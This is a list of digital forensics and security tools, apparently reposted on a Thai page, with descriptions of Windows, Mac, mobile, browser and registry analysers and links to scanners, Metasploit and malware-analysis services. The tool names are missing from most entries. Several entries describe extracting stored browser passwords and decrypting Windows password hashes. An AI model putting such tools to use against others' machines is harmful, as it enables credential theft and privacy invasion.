Chris Mayhew
GUI tool for parsing .lnk files, prefetch and jump list artefacts
Mrinal Kant, Tarakant Tripathy
Firefox add-on enabling viewing of any SQLite database
Microsoft
Command-line tool for text searches
MiTec
View and manage MS OLE Structured Storage based files
Mike’s Forensic Tools
Text replacement/converter/decoder for when dealing with URL encoding, etc
MiTeC
Analyse thumbs.db, Prefetch, INFO2 and .lnk files

Mac OS tools

Name
From
Description
Twocanoes Software
Audit Preference Pane and Log Reader for OS X
Aaron Burghardt
Blocks the mounting of file systems, complimenting a write blocker in disabling disk arbitration
Blackbag Technologies
Converts epoch times to local time and UTC
AccessData
Command line Mac OS version of AccessData’s FTK Imager
Blackbag Technologies
Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
Cyber Marshal
Command-line utility to capture physical RAM from Mac OS systems
Blackbag Technologies
Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors

Mobile devices

Name
From
Description
Leo Crawford, Mat Proud
Explore the internal file structure of Pad, iPod and iPhones
Robin Wood
Extracts phone model and software version and created date and GPS data from iPhone videos.
CCL Forensics
Deconstructs Blackberry .ipd backup files
SignalSEC Corp
Obtain SMS Messages, call logs and contacts from Android devices
Zena Forensics
Extract WhatApp messages from iOS and Android backups

Data analysis suites

Name
From
Description
Brian Carrier
Graphical interface to the command line digital investigation analysis tools in The Sleuth Kit (see below)
Backtrack
Penetration testing and security audit with forensic boot capability
Nanni Bassetti
Linux based live CD, featuring a number of analysis tools
Dr. Stefano Fratepietro and others
Linux based live CD, featuring a number of analysis tools
ArxSys
Analyses volumes, file systems, user and applications data, extracting metadata, deleted and hidden items
Harlan Carvey
Automates ‘repetitive tasks of data collection’. Fuller description here
Sumuri
Ubuntu based live boot CD for imaging and analysis
SANS
VMware Appliance pre-configured with multiple tools allowing digital forensic examinations
Brian Carrier
Collection of UNIX-based command line file and volume system forensic analysis tools
How-To Geek
Guide to using an Unbuntu live disk to recover partitions, carve files, etc.
Volatile Systems
Collection of tools for the extraction of artefacts from RAM

File viewers

Name
From
Description
Microsoft
View PowerPoint presentations
Microsoft
View Visio diagrams
VideoLAN
View most multimedia files and DVD, Audio CD, VCD, etc.


Internet analysis

Name
From
Description
CCL Forensics
Python module for performing off-line parsing of Chrome session files (“Current Session”, “Last Session”, “Current Tabs”, “Last Tabs”)
Nirsoft
Reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache
Mike’s Forensic Tools
Extracts embedded data held within Google Analytics cookies. Shows search terms used as well as dates of and the number of visits.
Busindre
Runs in Python 3.x, extracting forensic information from Firefox, Iceweasel and Seamonkey browsers. See manual for more information.
Belkasoft
Captures information publicly available in Facebook profiles.
Nirsoft
Extracts various details of Internet Explorer cookies
Nirsoft
Extract stored passwords from Internet Explorer versions 4 to 8
Nirsoft
Reads the cache folder of Firefox/Mozilla/Netscape Web browsers
Nirsoft
Parses the cookie folder of Firefox/Mozilla/Netscape Web browsers
Nirsoft
Reads the history.dat of Firefox/Mozilla/Netscape Web browsers, and displays the list of all visited Web page
Nirsoft
Extracts search queries made with popular search engines (Google, Yahoo and MSN) and social networking sites (Twitter, Facebook, MySpace)
Nirsoft
Extracts the user names and passwords stored by Mozilla Firefox Web browser
Nirsoft
Reads the cache folder of Opera Web browser, and displays the list of all files currently stored in the cache
Nirsoft
Decrypts the content of the Opera Web browser password file, wand.dat
Mandiant
Reviews list of URLs stored in the history files of the most commonly used browsers
Magnet Forensics
Takes list of URLs saving scrolling captures of each page. Produces HTML report file containing the saved pages

Registry analysis

Name
From
Description
Woanware
Extracts user information from the SAM, SOFTWARE and SYSTEM hives files and decrypts the LM/NT hashes from the SAM file
Microsoft
Examine Windows processes and registry threads in real time
US National Institute of Justice, Digital Forensics Solutions
For the acquisition, analysis, and reporting of registry contents
Harlan Carvey
Registry data extraction and correlation tool
Regshot
Takes snapshots of the registry allowing comparisons e.g., show registry changes after installing software
TZWorks
Extracts data from Shellbag entries
Woanware
Details previously attached USB devices on exported registry hives
4Discovery
Displays 20+ attributes relating to USB device use on Windows systems
Nirsoft
Details previously attached USB devices
4Discovery
Extracts SID, User Names, Indexes, Application Names, Run Counts, Session, and Last Run Time Attributes from UserAssist keys
Didier Stevens
Displays list of programs run, with run count and last run date and time
MiTec
Extracts configuration settings and other information from the Registry

Application analysis

Name
From
Description
Magnet Forensics
Decrypts the Dropbox filecache.dbx file which stores information about files that have been synced to the cloud using Dropbox
Magnet Forensics
Takes x,y,z coordinates found in a tile filename and downloads surrounding tiles providing more context
Sanderson Forensics
Extracts various data from the KaZaA application
Nirsoft
View and export Windows Live Messenger contact details
Nirsoft
View Skype calls and chats

Abandonware

Name
From
Description
Digital Detective
Converts various data types to date/time values
Rene Devichi
View unencrypted backups of iPad, iPod and iPhones
Foxton Software
Analysis of internet history data generated using Google Chrome
Nirsoft
Extracts recently visited Internet Explorer URLs




Domain and IP address query tools

DomainTools  https://www.domaintools.com
Domain Dossier  http://centralops.net/co/DomainDossier.aspx
IP to ASN Mapping http://www.team-cymru.org/IP-ASN-mapping.html
GeoLite2  http://dev.maxmind.com/geoip/geoip2/geolite2/
RIPEstat  https://stat.ripe.net
E-mail header analysis tools
Google Apps
Messageheader
https://toolbox.googleapps.com/apps/messageheader/
MXToolbox http://mxtoolbox.com/EmailHeaders.asp
Network monitoring tools
nfdump http://nfdump.sourceforge.net/
nfsen http://nfsen.sourceforge.net/
Network auditing tools
nmap https://nmap.org/>
AutoScan-Network http://autoscan-network.com/
Wireshark https://www.wireshark.org/
AbuseHelper https://github.com/abusesa/abusehelper>
Vulnerability assessment tools
Nessus http://www.tenable.com/products/nessusvulnerability-scanner
Metasploit https://www.metasploit.com
Vega https://subgraph.com/vega/index.en.html
OWASP ZAP https://www.owasp.org/index.php/OWASP_Zed_
Attack_Proxy_Project
SQLcheck http://www.softpedia.com/get/Internet/Servers/
Database-Utils/SQL-Check.shtml
Burp Suite https://portswigger.net/burp/
Kali https://www.kali.org/
Intrusion detection tools
Snort https://www.snort.org/
Tripwire https://sourceforge.net/projects/tripwire/
Forensic tools
Sleuth Kit http://www.sleuthkit.org/
Autopsy http://www.sleuthkit.org/autopsy/
Tcpxtract http://tcpxtract.sourceforge.net/
EnCase https://www.guidancesoftware.com/encaseforensic
FTK, Forensic
Toolkit
http://accessdata.com/solutions/digital-forensics/
forensic-toolkit-ftk
Malware analysis tools
VirusTotal  https://www.virustotal.com/
Malware Domain List   http://www.malwaredomainlist.com
Malware Hash Registry  http://www.team-cymru.org/MHR.html
MISP, Malware Information Sharing Platform   https://misppriv.circl.lu
AlienVault Open Threat Exchange   https://otx.alienvault.com
Malwr   https://malwr.com/
Honeypots
honeyd  http://www.honeyd.org/index.php
WiFi tools
inSSIDer  http://www.metageek.com/products/inssider/
Acrylic WiFi Scanner https://www.acrylicwifi.com/en/wlan-software/wlan-scanner-acrylic-wifi-free/
SIEM tools
Splunk   http://www.splunk.com
Encryption tools
GnuPG  https://www.gnupg.org/
VeraCrypt  https://veracrypt.codeplex.com/
Incident-tracking tools
RTIR  https://bestpractical.com
OTRS  https://www.otrs.com/
Databases
SQLite  https://www.sqlite.org/
MySQL  https://www.mysql.com/
PostgreSQL  https://www.postgresql.org/

  ที่มา:
thaicert  
kitploit

#WindowsForensic #computerforensic #ComputerForensics #dfir #forensics#digitalforensics #investigation #cybercrime 

#fraud #Cyber Forensic เครื่องมือ